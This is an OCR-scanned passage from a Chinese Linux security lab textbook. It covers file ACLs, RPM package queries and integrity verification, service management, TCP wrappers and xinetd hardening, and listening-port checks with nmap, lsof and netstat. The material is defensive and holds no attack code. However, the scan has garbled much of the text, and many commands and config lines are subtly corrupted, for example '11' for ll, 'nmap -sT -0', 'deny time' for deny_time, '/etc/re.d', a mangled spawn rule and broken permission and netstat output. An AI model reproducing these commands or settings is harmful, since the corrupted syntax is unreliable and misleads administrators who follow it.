LABEL=/home /home ext3 defaults,acl 
LABEL=/usr /usr ext3 defaults,acl 


然后 输入 命令 : #mount -o remount 或 者 重启 系统 就 可 以 了 。 
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(2) 以 根 用 户 登 录 系 统 ， 创 建 一 个 文件 test.txt， 执 行 结果 如 下 : 


[root@mylivx fsl]# echo "test acl"> test.txt 
[root@mylivx fsl]# 11 

total 8 

-rrW-r--r-- 1 root root 9 Aug 30 23:32 test.txt 


(3) 以 testuser 用 户 身 份 登录 系统 ， 进 行 写 测试 ， 执 行 结果 如 下 : 


[root@mylivx fsl]# su testuser 

[testuser@mylivx fs1]$ 1s 

test.txt 

[testuser@mylivx fs1]$ echo "Modify by testuser">test.txt 
bash: test.txt: Permission denied 

[testuser@mylivx fs1]$ exit 


exit 


(4) 使 用 setfacl 命令 设置 文件 test.txt， 使 得 用 户 testuser 具有 读 写 权 限 。 可 以 使 用 
getfacl 命令 查询 文件 ACL 属性 ， 可 以 看 出 设置 ACL 后 ，11 命令 输出 中 文件 权限 后 面 多 
出 一 个 “十 ” 这 也 是 ACL 执行 的 一 个 标志 ， 执 行 结果 如 下 : 


[root@mylivx fsl]# setfacl -m u:testuser:rw test.txt 
[root@mylivx fsl]# 11 

total 8 

-rw-rw-r--+ 1 root root 9 Aug 30 23:32 test.txt 
[root@mylivx fsl]# getfacl test.txt 

# file: test.txt 

# owner: root 

# group: root 

user::rw- 

user:testuser:rw- 

groups: :Fr-= 

mask: :rw- 

otherr :r== 

root@mylivx fsl]# cat test.txt 

test acl 

root@mylivx fsl]# su testuser 

testuser@mylivx fs1]$ cat test.txt 

test acl 

testuser@mylivx fs1]$ echo "Modify bu testuser">test.txt 
testuser@mylivx fsl]$ cat test.txt 

Modify bu testuser 


testuser@mylivx fs1]$ exit 


exit 


root@mylivx fsl]# su newuser 
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ow 
汪 
yy 


Su: user newuser does not exist 

[root@mylivx fsl]# su newuserl 

[newuserl@mylivx fs1]$ echo "Modify by newuser">>test.txt 
bash: test.txt: Permission denied 


[newuserl@mylivx fs1]$ 


【实验 报告 】 
(1) 叙述 常用 Linux 文件 权限 管理 操作 。 
(2) 分 析 Linux 下 使 用 ACL 的 好 处 。 


【思考 题 】 

(1) 查找 资料 ， 分 析 当 前 Linux 文件 权限 管理 存在 的 不 足 之 处 和 未 来 的 技术 发 展 
趋势 。 

(2) 以 root 用 户 登录 ， 进 入 到 /home/newuserl 目录 下 ， 创 建 一 个 文件 test.txt， 使 用 
1 命令 查看 文件 权限 设置 。 然 后 以 newuserl 用 户 登 录 ， 在 /home/newuserl 日 录 下 ， 尝 试 
使 用 vi 编辑 文件 test.txt， 查 看 系统 输出 。 

(3) 以 root 用 户 登录 ， 使 用 chmod 命令 更 改 test.txt 的 权限 ， 分 别 实验 表 9-1 中 的 权 
限 组 合 ， 并 以 newuserl 用 户 进行 测试 。 

(4) 以 root 用 户 登 录 , 使 用 chown 将 test.txt 的 属 主 更 改 为 newusel, 然后 以 newuserl 
用 户 登 录 ， 测 试 文件 权限 。 


9.2.2 RPM 软件 管理 


【实验 目的 】 
掌握 使 用 RPM 软件 包 管理 器 验证 文件 完整 性 的 方法 。 
【原理 简介 】 


基于 RPM 的 安装 包 (Red Hat 公司 开发 并 包含 在 其 Linux 产品 之 中 的 多 功能 软件 安 
装 管理 器 ， 现 有 多 种 版 本 的 Linux 使 用 此 管理 器 ， 如 Red Hat、TurboLinux )， 它 可 以 用 
来 建立 、 安 装 、 查 询 、 检 验 、 升 级 和 御 载 独立 的 软件 包 。 一 个 完整 的 RPM 包 包 括 压缩 
文件 和 包 信息 。 当 使 用 RPM 安装 软件 时 ，RPM 为 每 个 被 安装 的 文件 向 数据 库 中 添加 信 
息 ， 包 括 MD5 校 验 和 、 文 件 大 小 、 文 件 类 型 、 拥 有 者 、 组 和 权限 模式 。RPM 的 功能 
包括 : 

e 可 以 安装 、 删 除 、 升 级 和 管理 软件 。 

e@ 通过 RPM 包 管 理 能 知道 软件 包 包含 哪些 文件 ， 也 能 知道 系统 中 的 某 个 文件 属于 

哪个 软件 包 。 

。 可 以 查询 系统 中 的 软件 包 是 否 安装 以 及 其 版 本 。 

e。 支持 软件 包 签名 ， 可 以 验证 软件 包 的 完整 性 。 

e 依赖 性 的 检查 ， 查 看 是 否 有 软件 包 由 于 不 兼容 而 扰乱 了 系统 。 

由 于 RPM 具有 以 上 功能 所 以 是 一 个 重要 的 安全 管理 工具 。 
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【实验 环境 】 
Red Hat Linux 内 核 版 本 2.6 以 上 。 


【实验 步骤 】 
1. 已 经 安装 程序 的 信息 查询 


# rpm -q pagckagename 


# rpm -q setup 
setup-2.5.25-1 


得 到 安装 程序 的 版 本 信息 。 


2. 文件 拥有 的 包 


# rpm -qf filename 


# rpm -qf /etc/passwd 
setup-2.5.25-1 


证 明 /etc/passwd 文件 是 由 setup 安装 生成 的 。 


如 


3. 一 个 包 所 包含 的 文件 分 布 


# rpm -ql pagckagename 


# rpm -ql setup 

/etc/bashrc 

/etc/csh.cshrc 

/etc/csh.login 

/etc/exports 

/etc/filesystems 

/etc/group 
/usr/share/doc/setup-2.5.25 
/usr/share/doc/setup-2.5.25/uidgid 
/var/log/lastlog 


4. 安装 RPM 包 
# rpm -i packagename 


假设 要 安装 一 个 RPM 的 包 ， 那 么 对 应 就 必须 知道 包 的 路 径 ， 可 以 从 本 地 路 径 、 光 
网 络 等 上 面 的 包 进 行 安装 。 同 时 也 可 以 对 多 个 包 进 行 安装 ， 如 : 


# rpm -i /mnt/cdrom/RedHat/RPMS/setup-* 
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表示 同时 对 所 有 光盘 里 面 RedHat/RPMS/ 目 录 下 所 有 以 setup 开头 的 包 进行 安装 。 
也 可 以 从 网 络 上 进行 包 的 安装 : 


# rpm -ivh ftp://anonymous@ftp.redhat.com/pub/redhat/linux/rawhide/ 
i386/RPMS/lynx-* 


上 面 的 -v 和 -h 参数 是 扩展 设置 带 散 列 的 元 长 输出 ， 可 以 监视 安装 进程 。 

5. 包 的 升级 

包 的 升级 是 有 风险 的 ， 有 些 程序 进行 了 配置 ， 如 果 升 级 后 ， 可 能 丢失 配置 信息 。 要 
升级 包 可 以 使 用 下 面 的 命令 : 

# rpm -U packagename 

# rpm -F packagename 

-U-F 都 能 够 升级 包 ， 差 别 在 于 没有 已 安装 的 RMP 包 时 ，-U 命令 安装 新 包 ，-F 不 安 
装 新 包 。 

一 般 升级 的 时 候 也 使 用 -v-h 来 监控 安装 进程 : 


# rpm -Uvh /mnt/cdrom/RedHat/RPMS/lynx-* 


6. 包 的 依赖 性 

升级 包 的 时 候 ， 有 的 包 是 具有 依赖 性 的 ， 比 如 要 安装 某 个 程序 ， 但 是 对 应 的 程序 没 
有 安装 ， 比 如 要 编译 内 核 ， 那 么 编译 器 就 要 先 安 装 。 当 然 ， 也 能 够 使 用 --nodeps 来 忽略 
包 的 依赖 性 。 比 如 安装 内 核 源 代 码 ， 那 么 对 应 就 应 该 先 安装 gcc 编译 器 。 

可 以 使 用 下 面 的 命令 来 忽略 依赖 性 提示 后 正常 安装 程序 : 

# rpm -Uvh --nodeps /mnt/cdrom/RedHat/RPMS/kernel-source-* 

# rpm -Uvh /mnt/cdrom/RedHat/RPMS/gcc-3-* 


7. 包 的 删除 
包 的 删除 比较 容易 ， 使 用 : 


# rpm -e packagename 

就 能 够 删除 自己 想 要 删除 的 包 ， 不 需要 知道 版 本 和 路 径 ， 比 如 要 删除 内 核 源 代码 包 : 
# rpm -e kernel-source 

也 能 够 同时 删除 多 个 包 : 
# rpm -e kernel-source gcc 


那么 就 会 同时 把 kernel-source 和 gcc 的 包 删 除 。 

8. 安装 软件 的 完整 性 检查 

RPM 包含 各 类 用 于 查询 软件 包 及 其 内 容 的 选项 。 对 于 那些 怀疑 重要 的 系统 文件 和 可 
执行 文件 已 被 修改 的 管理 员 来 说 ， 这 些 校 验 选 项 具有 很 高 的 价值 。 
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(1) 首先 需要 把 Linux 系统 的 GPG 公 钥 导入 到 系统 的 RPM 密 钥 环 上 。 该 公 钥 会 校 
验 安装 在 系统 上 的 软件 包 是 否 包含 软件 包 签名 ， 从 而 确保 这 些 软件 包 的 确 来 自 合适 的 厂 
商 。 可 以 使 用 以 下 命令 来 导入 公 钥 (把 <version> 改 成 安装 在 系统 上 的 RPM 版 本 ): 


rpm --import /usr/share/doc/rpm-<version>/RPM-GPG-KEY 

要 显示 所 有 已 安装 的 用 于 RPM 校 验 的 公 钥 列表 ， 执 行 以 下 命令 : 

rpm -qa gpg-pubkey* 

红 帽 公 钥 的 输出 会 包括 : 

gpg-pubkey-db42a60e-37ea5438 

要 显示 特定 公 钥 的 细节 ， 使 用 rpm -qi 命令 和 前 一 命令 的 输出 。 在 这 个 例子 中 是 : 
rpm -qi gpg-pubkey-db42a60e-37ea5438 


(2) 使 用 命令 rpm -V 软件 包 名 称 来 验证 软件 包 的 合法 性 。 如 果 该 命令 没有 显示 任 
何 输出 而 退出 ， 这 就 意味 着 其 中 所 有 文件 自从 最 后 一 次 RPM 数据 库 更 新 以 来 都 没有 被 
修改 。 如 果 该 命令 给 出 了 错误 ， 例 如 : 


S$.5....T ¢ /bin/ps 


那么 , 这 就 说 明 该 文件 已 被 修改 了 。 需 要 决定 是 应 该 保留 它 (如 果 被 修改 的 文件 是 /ete 中 
的 配置 文件 ， 如 果 是 管理 员 修改 的 配置 则 是 正常 的 ) 还 是 删除 它 后 再 重新 安装 包含 这 个 
文件 的 软件 包 。 以 下 列表 解释 了 表示 校 验 失败 的 这 8 个 字符 (上面 例子 中 是 S.5..…T) 的 

. 一 一 已 通过 这 一 阶段 的 校 验 测试 。 

? 一 一 测试 中 发 现 了 一 份 无 法 读 取 的 文件 ， 这 极 可 能 是 文件 权限 问题 。 

S 一 一 测试 中 发 现 了 一 份 比 最 初 安装 在 系统 上 的 文件 稍 大 或 稍 小 的 文件 。 

5 一 一 测试 中 发 现 了 一 份 和 最 初 安装 时 的 MD5 校 验 和 不 匹配 的 文件 。 

M 一 一 测试 中 检测 到 文件 权限 或 文件 类 型 错误 。 

D 一 一 测试 中 检测 到 主 /次 号 码 不 匹配 的 设备 文件 。 

L 一 一 测试 中 找到 一 个 被 改变 到 另 一 个 文件 路 径 的 符号 链接 。 

U 一 一 测试 中 找到 一 份 用 户 所 有 者 被 改变 的 文件 。 

G 一 一 测试 中 找到 一 份 组 群 所 有 者 被 改变 的 文件 。 

T 一 一 测试 中 遇 到 文件 的 mtime 校 验 错误 。 

(3) 还 可 以 使 用 以 下 命令 : 


rpm -Va 


-Va 选项 校 验 所 有 安装 了 的 软件 包 ， 并 找 出 校 验 测试 中 的 失败 之 处 (和 -V 选项 相 
似 )， 但 是 由 于 它 校 验 每 个 安装 了 的 软件 包 ， 其 输出 要 比 -V 选项 更 详细 。 
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rpm -Vf /bin/ls 


-Vf 选项 校 验 菜 个 安装 了 的 软件 包 中 的 单个 文件 。 如 果 只 打算 快速 地 校 验 一 个 有 疑 
点 的 文件 ， 这 个 选项 就 很 有 用 。 


rpm -K application-1.0.i386.rpm 


-K 选项 对 于 检查 RPM 软件 包 文件 的 MD5 校 验 和 与 GPG 签名 来 说 很 有 用 。 可 以 
用 它 来 检查 想 安装 的 软件 包 是 否 被 厂商 〈 如 Red Hat Inc.) 或 被 其 他 已 导入 GPG 公 钥 
的 机 构 签名 了 。 没 有 被 正确 签名 的 软件 包 会 显示 一 条 和 以 下 内 容 相似 的 消息 : 


application-1.0.i386.rpm (SHA1) DSA shal md5 (GPG) NOT OK 
(MISSING KEYS: GPG#897da07a) 


请 谨慎 安装 未 被 签名 的 软件 包 ， 因 为 它们 没有 被 厂商 〈 如 Red Hat Inc.〉 批准， 有 
可 能 包含 有 害 源 码 。 

【实验 报告 】 

(1) 使 用 RPM 对 系统 的 软件 进行 管理 。 

(2) 验证 系统 内 安装 软件 的 完整 性 ， 并 分 析 结 果 。 


【思考 题 】 

分 析 RPM 管理 系统 验证 软件 完整 性 的 原理 。 

93 服务 器 安全 

9.3.1 ”系统 安全 设置 

【实验 目的 】 

掌握 Linux 下 服务 管理 的 方法 ， 了 解 一 般 系统 常用 的 服务 。 
【原理 简介 】 


Linux 作为 一 个 网 络 操作 系统 ， 最 主要 的 功能 就 是 提供 各 种 网 络 服务 ， 而 每 个 网 络 
服务 都 是 带 着 各 种 各 样 的 安全 等 级 进入 系统 的 一 扇 门 。 为 了 方便 用 户 建立 Linux 服务 器 
系统 ， 绝 大 部 分 Linux 分 版 默认 安装 了 尽 可 能 多 的 服务 ， 而 这 些 服务 ， 有 一 些 是 用 户 不 
需要 、 不 了 解 的 服务 ， 有 些 是 必须 改变 其 默认 配置 和 安装 修补 版 本 才能 保证 其 安全 的 服 
务 。 开 启 的 服务 越 多 ， 开 放 的 端口 越 多 ，Linux 服务 器 的 安全 风险 就 越 高 。 

就 安全 性 而 言 ,Linux 相对 于 Windows 具有 更 多 的 优势 .但 是 ,不 管 选择 哪 一 种 Linux 
发 行 版 本 ， 在 安装 完成 以 后 都 应 该 进行 一 些 必要 的 配置 ， 来 增强 它 的 安全 性 。 要 建立 一 
个 安全 Linux 服务 器 就 首先 要 了 解 Linux 环境 下 和 网 络 服务 相关 的 配置 文件 的 含义 及 如 
何 进行 安全 的 配置 。 本 实验 全 面 讲 述 了 Linux 平台 下 重要 服务 的 配置 方法 ， 其 中 Apache 
服务 和 FTP 服务 的 安全 配置 将 在 后 面 的 章节 中 讲述 。 
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【实验 环境 】 
Red Hat Linux 9.0 或 Fedora CoreLinux 3 以 上 的 版 本 。 
【实验 步骤 】 
1. 服务 管理 


(1) Linux 的 服务 都 是 以 脚本 的 方式 来 运行 的 ， 存 在 于 /etc/rc.d/ init.d 目录 下 所 有 的 
脚本 就 是 系统 的 服务 脚本 。 它 具有 两 项 作用 ， 一 项 是 在 系统 启动 的 时 候 自动 启动 那些 脚 
本 中 所 要 求 启 动 的 程序 ， 另 一 项 是 通过 该 脚本 来 对 服务 进行 控制 ， 比 如 启动 、 停 止 等 。 
首先 查看 当前 系统 所 有 的 服务 ， 下 面 命令 里 面 列 出 的 就 是 目前 系统 中 所 有 的 服务 ， 每 次 


系统 启动 的 时 候 ， 根 据 配置 相应 的 服务 就 会 启动 。 


[root@mylinux init.d]# ls 
aep1000 firstboot kdcrotate network pxe smb winbind 
anacron functions keytable nfs random snmpd xfs 
apmd gpm killall nfslock rawdevices snmptrapd xinetd 
atd halt kprop nscd rhnsd squid ypbind 
autofs httpd krb524 ntpd ripd sshd yppasswdd 
bcm5820 iptables krb5kdc ospf6d ripngd syslog ypserv 
bgpd irda kudzu ospfd saslauthd tux ypxfrd 
crond isdn named pcmcia sendmail vmwaretools zebra 
cups kadmin netfs portmap single vsftpd 
服务 脚本 操作 如 表 9-2 所 示 。 
表 9-2 服务 脚本 操作 
操 作 作 
Start 启动 服务 ， 等 价 于 服务 脚本 里 的 start 命令 
Stop 停止 服务 ， 等 价 于 服务 脚本 stop 命令 
Restart 关闭 服务 ， 然 后 重新 启动 ， 等 价 于 脚本 restart 命令 
Reload 使 服务 不 重新 启动 而 重读 配置 文件 ， 等 价 于 服务 脚本 的 reload 命令 
Status 提供 服务 的 当前 状态 ， 等 价 于 服务 脚本 的 status 命令 
condrestart 如 果 服 务 锁定 ， 则 这 个 来 关闭 服务 ， 然 后 再 次 启动 ， 等 价 于 condrestart 命令 


比如 ， 要 重新 启动 Samba， 则 可 以 用 root 用 户 运 行 下 面 两 个 命令 ， 效 果 一 样 : 


# /etc/rc.d/init.d/smb restart 
# service smb restart 


假如 要 系统 启动 的 时 候 自 动 启动 某 个 服务 ， 那 么 就 配置 好 一 个 服务 脚本 ， 放 到 
/etc/re.d/init.d 里 面 即 可 。 相 应 地 ， 如 果 要 删除 哪个 服务 ， 把 其 脚本 移 走 即 可 。 
中 的 【系统 设置 】| 【服务器 


(2) 以 root 用 户 登录 系统 ， 单 击 Red Hat Linux 主 菜 重 


设置 并 服务 菜单 项 , 出 现 如 图 9-5 所 示 的 管理 界面 , 通过 这 个 界面 可 以 对 当前 /etc/init.d 
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目录 下 的 服务 进 


134 


(3) 下 面 启 用 httpd 服务 ， 并 使 该 服务 自动 启动 ， 可 以 选择 左 侧 
单 击 Start 按钮 即 可 ， 最 终结 果 如 图 9-6 所 示 。 


Service Configuration 要 
Ele View Actions EditRunlevel Help | 


时 上 四 印 日 
Stat Stop Restat Save Revert 
Curently Running in Runlevel: 5 Editing Runlevel: 5 
[9 -Description 
Apache is a World Wide Web server. Itis used to serv' 
HTML files and CGI. 


iptables 
口 da 
isdn 


图 9-5 服务 配置 管理 界面 


Ele View Actions Edit Runlevel Help 


时 人 @ 怨 日 

Stat Stop Restart Save Rever 

Curently Running in Runlevel: 5 Editing Runlevel: 5 
Description 

Apache is a World Wide Web server. Itis used to serve 
HTML files and CGI. 


“Status 
httpd (pid 3166 3165 3164 3163 3162 3161 3160 3159 3156) is 
running... 


isdn 


图 9-6 httpd 服务 的 配置 


的 hpptd 选项 ， 然 后 


(4) 有 些 网 络 服务 需要 使 用 超级 服务 xinetd 来 启动 ， 比 如 echo 服务 ， 这 种 服务 必须 
通过 xinetd 服务 来 启动 ， 方 法 是 以 root 进入 /etc/xinetd.d 编辑 echo 脚本， 如 下 所 示 。 


# default: off 
# description: An xinetd internal service which echo's characters back to 


clients. \ 


# This is the tcp version. 


service echo 


{ 


disable = no # yes 表示 不 启动 ，no 表示 启动 


type 
id 


INTERNAL 
= echo-stream 


Socket type = stream 


protocol 


= tcp 
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编辑 脚本 后 ， 进 入 /etc/init.d 目录 使 用 命令 ./xinetd restart 即 可 启动 echo 服务 。 

2. 使 用 TCP wrappers 程序 来 维护 服务 安全 

TCP wrappers 程序 为 多 项 服务 提供 访问 控制 ,多数 现代 的 网 络 服务 , 如 SSH、 TelInet 
和 FTP， 都 使 用 TCP wrappers 程序 。 该 wrappers 程序 位 于 进入 请 求 和 被 请 求 服务 之 间 。 
当 与 xinetd 一 起 使 用 时 ，TCP wrappers 程序 的 优越 性 就 更 为 显著 。xinetd 是 一 种 提供 附 
加 的 访问 、 记 录 、 关 联 、 重 导向 和 资源 利用 控制 的 超级 服务 。 

(1) TCP wrappers 程序 和 连接 横幅 。 给 连接 服务 的 客户 发 送 一 幅 警 戒 性 横幅 是 掩盖 
服务 器 所 使 用 的 系统 的 好 办 法 。 同 时 ， 它 也 让 潜在 的 攻击 者 知道 系统 管理 员 是 相当 警惕 
的 。 要 为 某 服务 实现 TCP wrappers 程序 横幅 ， 请 使 用 banner 选项 。 这 个 例子 为 vsftpd 
实现 了 一 个 横幅 。 首 先 ， 创 建 一 个 横幅 文件 。 它 可 以 位 于 系统 上 的 任何 地 方 ， 但 是 它 的 
名 称 必须 和 守护 进程 相同 。 在 这 个 例子 中 ， 该 文件 叫 作 /etc/banners/vsftpd。 该 文件 的 内 
容 如 下 所 示 : 

220-Hello, %c 


220-All activity on ftp.example.com is logged. 
220-Act up and you will be banned. 


%e 代表 提供 了 各 类 客户 信息 ， 如 用 户 名 和 主机 名 ， 或 用 户 名 和 IP 地 址 。 要 把 这 
个 横幅 展示 给 每 个 进入 连接 ， 把 以 下 行 添加 到 /etc/hosts.allow 文件 中 : 


vsftpd : ALL : banners /etc/banners/ 


(2) TCP wrappers 程序 和 攻击 警告 。 如 果 某 个 主机 或 网 络 被 发 现 正 在 攻击 服务 器 ， 
TCP wrappers 程序 可 以 通过 spawn 指令 对 来 自 该 主机 或 网 络 的 后 续 攻 击 向 管理 员 发 出 
警告 。 在 这 个 例子 中 , 假定 某 个 来 自 206.182.68.0/24 网 络 的 黑客 被 发 现 正在 试图 攻击 服 
务 器 。 如 果 把 以 下 行 添 加 到 /etc/hosts.deny 文件 中 ， 连 接 企图 就 会 被 拒绝 并 记录 在 一 个 
特殊 的 文件 中 。 


ALL : 206.182.68.0 : spawn /bin/ 'date' %c %d >> /var/log/intruder alert 


%d 代表 提供 攻击 者 其 他 访问 的 服务 名 称 。 

因为 spawn 指令 执行 任何 shell 命令 , 可 以 创建 一 个 脚本 , 该 脚本 会 在 某 个 特定 客 
户 企 图 连接 服务 器 的 时 候 通 知 管理 员 或 执行 一 系列 命令 。 

(3) TCP wrappers 程序 和 强化 记录 。 如 果 某 类 连接 比 其 他 连接 更 值得 关注 ， 可 以 通 
过 severity 选项 来 提高 该 类 服务 的 记录 级 别 。 在 这 个 例子 中 ， 假 定 每 个 企图 连接 FTP 服 
务 器 的 端口 23 (Telnet 端口 ) 的 客户 都 是 黑客 。 在 日 志文 件 中 放置 一 个 emerg 标记 而 
不 是 使 用 默认 的 info 标记 来 否定 连接 。 要 达到 这 个 目的 ， 把 以 下 行 放 在 /etc/hosts.deny 
文件 中 : 
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in.telnetd : ALL : severity emerg 


它 使 用 默认 的 authpriv 记录 设施 ， 把 优先 级 别 从 默认 的 info 提高 到 emerg， 这 会 
把 日 志 消 息 直 接 显示 在 控制 台 上 。 配 置 好 之 后 ， 尝 试 从 其 他 机 器 上 Telnet 连接 本 机 进行 

3. 使 用 xinetd 来 增强 安全 性 

xinetd 超级 服务 器 是 另 一 个 用 来 控制 对 其 从 属 服务 访问 的 有 用 工具 。 下 面 集中 讨论 
如 何 使 用 xinetd 设置 陷阱 服务 ， 以 及 如 何 使 用 它 来 控制 任何 给 定 xinetd 服务 可 以 使 用 
的 资源 数量 ， 从 而 阻止 拒绝 服务 攻击 。 要 阅读 更 全 面 的 可 用 选项 列表 , 请 参考 xinetd 和 
xinetd.conf 的 说 明 书 页 。 

(1) 设置 陷阱 。xinetd 的 一 个 重要 功能 是 自动 把 恶意 主机 添加 到 全 局 no_access 列 
表 的 能 力 。 如 果 一 个 主机 在 这 个 列表 上 , 它 对 xinetd 管理 的 服务 的 后 续 连接 都 会 被 拒绝 
一 段 时 间 ， 直 到 xinetd 被 重新 启动 为 止 。 这 是 通过 使 用 SENSOR 属性 来 实现 的 。 该 技 
术 是 阻塞 试图 扫描 服务 器 端口 的 主机 的 简单 方法 。 设 置 SENSOR 的 第 一 个 步骤 是 选择 
不 打算 使 用 的 服务 。 以 下 以 Telnet 为 例 进行 说 明 。 编 辑 /etc/xinetd.d/telnet 文件 ， 把 含 
有 flags 的 行 改 成 : 


flags = SENSOR 


在 括号 内 添加 以 下 行 : 


deny time = 30 


这 会 拒绝 试图 连接 到 端口 的 主机 在 今后 30min 内 的 所 有 连接 。deny_time 属性 还 有 一 个 
可 接受 的 值 是 FOREVER, 它 会 使 该 禁令 在 xinetd 被 重新 启动 前 保持 有 效 ; NEVER 则 
会 允许 连接 并 且 记 录 它 。 最 后 ， 确 定 一 下 这 个 文件 如 下 : 


# default: on 

# description: The telnet server serves telnet sessions; it uses \ 
# unencrypted username/password pairs for authentication. 
service telnet 


{ 


flags = SENSOR 

deny time = 30 

Socket type = stream 

wait = no 

user = root 

server = /usr/sbin/in.telnetd 


log on failure += USERID 
disable = no 
} 


设置 好 之 后 ， 打 开本 机 的 echo 服务 ,首先 从 其 他 机 器 上 试图 连接 本 机 的 echo 端口 ， 
系统 可 以 提供 echo 服务 ,退出 ,然后 再 连接 本 机 Telnet 端口 ， 连 接 不 成 功 ， 再 连接 本 机 
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的 echo 端口 ， 连 接 也 不 成 功 。 

(2) 控制 服务 器 资源 。xinetd 的 另 一 个 重要 功能 是 它 能 够 控制 从 属 服务 可 以 使 用 的 
资源 量 。 它 通过 以 下 指令 来 达到 这 个 目的 : 

cps = <number_of connections><wait_period> 一 一 指定 每 秒 钟 内 被 允许 到 服务 的 连接 
数量 。 该 指令 只 接受 整数 值 。 

instances = <number_of connections> 一 一 指定 允许 到 服务 的 连接 总 数 ,该 指令 接受 整 
数值 或 UNLIMITED。 

per_source = <number_of connections> 一 一 指定 每 个 主机 被 允许 到 服务 的 连接 数量 。 
该 指令 接受 整数 值 或 UNLIMITED。 

rlimit as = <number[KIM]> 指定 服务 可 以 占用 的 内 存 地 址 空间 数量 ， 以 KB 或 
MB 为 单位 。 该 指令 接受 整数 值 或 UNLIMITED。 

rlimit_cpu = <number of seconds> 一 一 指定 服务 占用 CPU 的 时 间 (以 s 为 单位 )。 
该 指令 接受 整数 值 或 UNLIMITED。 

使 用 这 些 指令 有 助 于 防止 某 个 xinetd 服务 大 量 占用 系统 ， 从 而 导致 “拒绝 服务 ” 情 
况 的 出 现 。 

4. 检查 正在 监听 的 端口 

(1) 配置 了 网 络 服务 之 后 , 关注 一 下 哪些 端口 在 监听 系统 的 网 络 接 口 这 一 点 很 重要 。 
任何 打开 的 端口 都 可 能 会 是 网 络 正 被 入 侵 的 证 明 。 要 列举 正在 监听 网 络 的 端口 ， 有 两 种 
基本 方法 。 一 种 不 太 可 靠 的 方法 是 通过 输入 netstat -an 或 lsof -i 之 类 的 命令 来 查询 网 络 堆 
栈 。 这 种 方法 之 所 以 不 太 可 靠 是 因为 这 些 程序 不 连接 网 络 上 的 机 器 ， 而 是 查看 系统 上 在 
运行 什么 ,因此 ,它们 频繁 成 为 攻击 者 的 替换 目标 ， 该 程序 有 可 能 被 黑客 的 程序 替换 了 ， 
从 而 掩盖 他 们 的 踪迹 。 更 可 靠 的 方法 是 使 用 nmap 之 类 的 端口 扫描 器 来 检查 哪些 端口 正 
在 监听 网 络 。 以 下 从 控制 台 发 出 的 命令 会 判定 哪些 端口 在 监听 来 自 网 络 上 的 TCP 连接 ， 
执行 结果 如 下 : 


[root@localhost xinetd.d]# nmap -sT -0 localhost 


Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-04-01 21:07 CST 
Interesting ports on localhost.localdomain (127.0.0.1): 

(The 1655 ports scanned but not shown below are in state: closed) 
PORT STATE SERVICE 

7T/tcp open echo 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

37/tcp open time 

111l/tcp open rpcbind 

631/tcp open ipp 

Device type: general purpose 

Running: Linux 2.4.X|2.5.X|2.6.X 
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OS details: Linux 2.5.25- 2.6.3 or Gentoo 1.2 Linux 2.4.19 rcl-rc7), Linux 


2 .6.3 = 2.6.8 
Uptime 0.196 days (since Sat Apr 1 16:26:03 2006) 


Nmap finished: 1 IP address (1 host up) scanned in 3.954 seconds 


[root@localhost xinetd.d]# 


(2) 使 用 netstat 或 lsof 检查 端口 的 信息 。 以 下 是 命令 的 输出 部 分 : 


[root@localhost xinetd.d]# lsof -i 


COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME 

portmap 1688 rpc 3u IPv4 9491 UDP *:sunrpc 

portmap 1688 rpc 4u IPv4 9495 TCP *:sunrpc (LISTEN) 
mDNSRespo 2000 nobody 8u IPv4 9949 UDP *:5353 

cupsd 2090 root Ou IPv4 10252 TCP localhost.localdomain:ipp 
(LISTEN) 

cupsd 2090 root 2u IPv4 10253 UDP *:ipp 

sshd 2138 root 3u IPv6 10274 TCP *:ssh (LISTEN) 
sendmail 2164 root du IPv4 10369 TCP localhost.localdomain:smtp 
(LISTEN) 

vsftpd 3003 root 3u IPv4 23125 TCP *:ftp (LISTEN) 

xinetd 13506 root 5u IPv4 67742 TCP *:echo (LISTEN) 
xinetd 13506 root 6u IPv4 67743 TCP *:telnet (LISTEN) 
xinetd 13506 root 8u IPv4 67744 TCP *:time (LISTEN) 


[root@localhost xinetd.d]# netstat -anp 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address State 


PID/Program name 


tcp 0 00.0.0.0:32769 O00.03* LISTEN 1706/rpc.statd 
tcp 0 00.0.0.0:37 0.0.0.0:* LISTEN 13506/xinetd 
tcp 0 O00.0.0.087 O00.0s* LISTEN 13506/xinetd 
tcp 0 0 0.0.50.0:111 0000ss LISTEN 1688/portmap 
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 3003/vsftpd 
tcp 0 00.0.0.0:23 O00D LISTEN 13506/xinetd 
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2090/cupsd 

tcp 0 0127,0.0,1:5335 0,.0.0.0s* LISTEN 2000/mDNSResponder 
tcp 0 0 227,00: L253 0.0.0.0:* LISTEN 2164/sendmail: acce 
tcp 0 0 E22 生生 LISTEN 2138/sshd 

udp 0 0 0.0.0.0:32769 QO.0.0.0:* 1706/rpc.statd 

udp 0 00.0.0.0:610 0.0.0.0:™ 1706/rpc.statd 

udp 0 0 0.0.0.0:5353 0.0.0.0:* 2000/mDNSResponder 

udp 0 0 0.0.0.0:111 0.0.0.0:* 1688/portmap 

udp 0 0 0.0.0.0:631 O00.04* 2090/cupsd 


这 些 工 具 揭示 了 大 量 关 于 运行 在 机 器 上 的 服务 状态 的 信息 。 它 们 很 灵活 ， 能 够 提供 
网 络 服务 和 配置 的 许多 信息 。 
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【实验 报告 】 

(1) 详细 叙述 实验 过 程 ， 并 分 析 各 种 设置 所 起 的 安全 作用 。 

(2) 分 析 Linux 下 网 络 服务 安全 设置 与 Windows 下 安全 设置 的 异同 。 

【思考 题 】 

Snort 是 一 款 重要 开源 代码 的 网 络 入 侵 检 测 系统 , 它 能 够 发 现 来 自 网 络 的 各 种 攻击 行 
为 ， 请 从 http://www.snort.org 网 站 上 下 载 Snort 软件 ， 在 Linux 操作 系统 中 安装 并 测试 ， 
分 析 入 侵 检测 系统 在 服务 器 安全 中 的 作用 。 


9.3.2 IPSec 配置 


【实验 目的 】 
掌握 Linux 下 IPSec 的 安全 配置 ， 了 解 网 络 安全 通信 的 原理 。 
【原理 简介 】 


Linux 支持 使 用 IPsec 在 互联 网 上 使 用 安全 隧道 来 连接 远程 主机 和 网 络 。IPsec 可 以 
使 用 主机 到 主机 一 个 计算 机 工作 站 到 另 一 个 计算 机 工作 站 ) 或 网 络 到 网 络 (一 个 
LAN/WAN 到 另 一 个 LAN/WAN) 来 实现 。Linux 中 的 IPsec 实现 使 用 互联 网 密 钥 交换 
